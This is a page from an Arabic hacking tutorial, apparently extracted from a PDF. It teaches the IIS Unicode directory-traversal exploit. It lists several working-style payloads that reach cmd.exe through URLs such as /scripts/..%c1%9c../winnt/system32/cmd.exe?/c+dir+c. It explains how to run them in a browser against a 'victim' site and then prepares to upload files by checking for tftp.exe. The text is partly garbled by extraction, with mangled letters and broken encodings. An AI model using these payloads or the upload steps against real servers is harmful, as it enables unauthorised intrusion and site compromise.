Page 321 - بسم الله الرحمن الرحيم

P. 321

‫‪\:scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c/‬‬
‫‪\:scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c/‬‬
‫‪\:scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c/‬‬
‫‪\:scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c/‬‬
‫‪\:scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c/‬‬
‫‪\:scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c/‬‬

‫‪msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\/‬‬
‫‪\:%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir+c‬‬

‫وطريقة تصنفيذها من المتصفح‬
‫ومكان تصنفيذها بعد اسم الموقع‬

‫مثال ‪:‬‬
‫‪+\http://www.xxxxx.com/à/€/à/€/à/€/¯....2/cmd.exe/?/c‬‬

‫أي بعد دوت كو‪.‬م‬
‫بعض الناس يسألون مالذي يظهر او على اي شكل يظهر‬

‫الحل بسيط‬
‫‪ Dir‬هذا المر لو قمت بكتابته في نافذة الدوس ستظهر لك الملفات‬

‫وطريقة ظهور الملفات في المتصفح تصقريبا‬
‫بنفس طريقة الدوس‬

‫إذا نجحت في تصنفيذ الثغرة واظهرت الملفات امامك فتبدأ في تصنفيذالخطوة الثانية‬
‫الخطوة الثانية عمل ابلود للملف الذي تصريد تصحميله‬
‫وعمل البلود أيض اً ليحتاج الى ختبرة‬
‫لكن هنالك شروط لكي تصعمل ابلود‬

‫يجب التأكد من أن التي إف تصي بي مثبت على الموقع الضحية‬
‫وللكي تصتأكد إتصبع التصي‬

‫يجب الدختول على ملف السستم ‪ 32‬ولكي تصدختله يجب أن تصضيف بعض الكلمات على الثغرة التي نجحت في‬
‫تصنفيذها‬
‫مثال‪:‬‬

‫‪\:http://www.xxxxxx.com/scripts/..Á ../winnt/system32/cmd.exe?/c+dir+c‬‬
‫هذه الثغرة عملت في الموقع المطلوب ورأيت الملفات‬
‫لحظ التغير‬
‫‪http://www.xxxxxx.com/scripts/..Á‬‬

‫‪\../winnt/system32/cmd.exe?/c+dir+c:\Winnt\Sytem32‬‬
‫ماوضع على الثغرة هو أسماء لملفات متواجهدة داختل الويندوز ‪\Winnt\Sytem32‬‬

‫أي يجب عليك الدختول على هذه الملفات لكي تصتأكد‬
‫بعض القراء يتسالون ‪ .....‬الثغرة التي نستخدمها ليست متطابقة مع هذه الثغرة ولكن هذا ليس شرط‬

‫للتطابقها يجب عليك الدختول باي كان على مللف السستم‬
‫ممكن يكون احد القراء اشتغلت معاه هذه الثغرة‬

‫‪\:http://www.xxxxx.com/scripts/..ü€€€....exe?/c+dir+c‬‬
‫ويقول كيف ادختل على ملف السستم‬

‫الحل هو واحد يجب عليك إضافة اسماء الملفات لكي تصدختل على السستم ‪32‬‬
‫اي بعد هذا المتداد‬

‫‪\:c+dir+c‬هنا تصضيف أسماء الملفات‬
‫‪/http://www.xxxxx.com/scripts/..ü€€€...Winnt/System32‬‬

‫كما قلنا سابق اَ لتصحتاج الى ختبرة‬
‫وبعد دختول ملف السستم ستظهر لك محتوياتصه‬

‫ويجب على آنذاك البحث عن برنامج يسمي‬
‫‪ tftp.exe‬يعني دور على هذا البرنامج الين ماتصلقاه وتصتأكد من انه في الجهاز‬

‫لن هذا البرنامج يعتبر شرط لكي تصعمل ابلود للصفحة‬
‫ولو لقيت البرنامج اتصفاءل بالخير يعني بإذن ال تصعبك ماهو رايح على الفاضي‬
‫‪.........................................................................................‬‬

‫‪321‬‬

316 317 318 319 320 321 322 323 324 325 326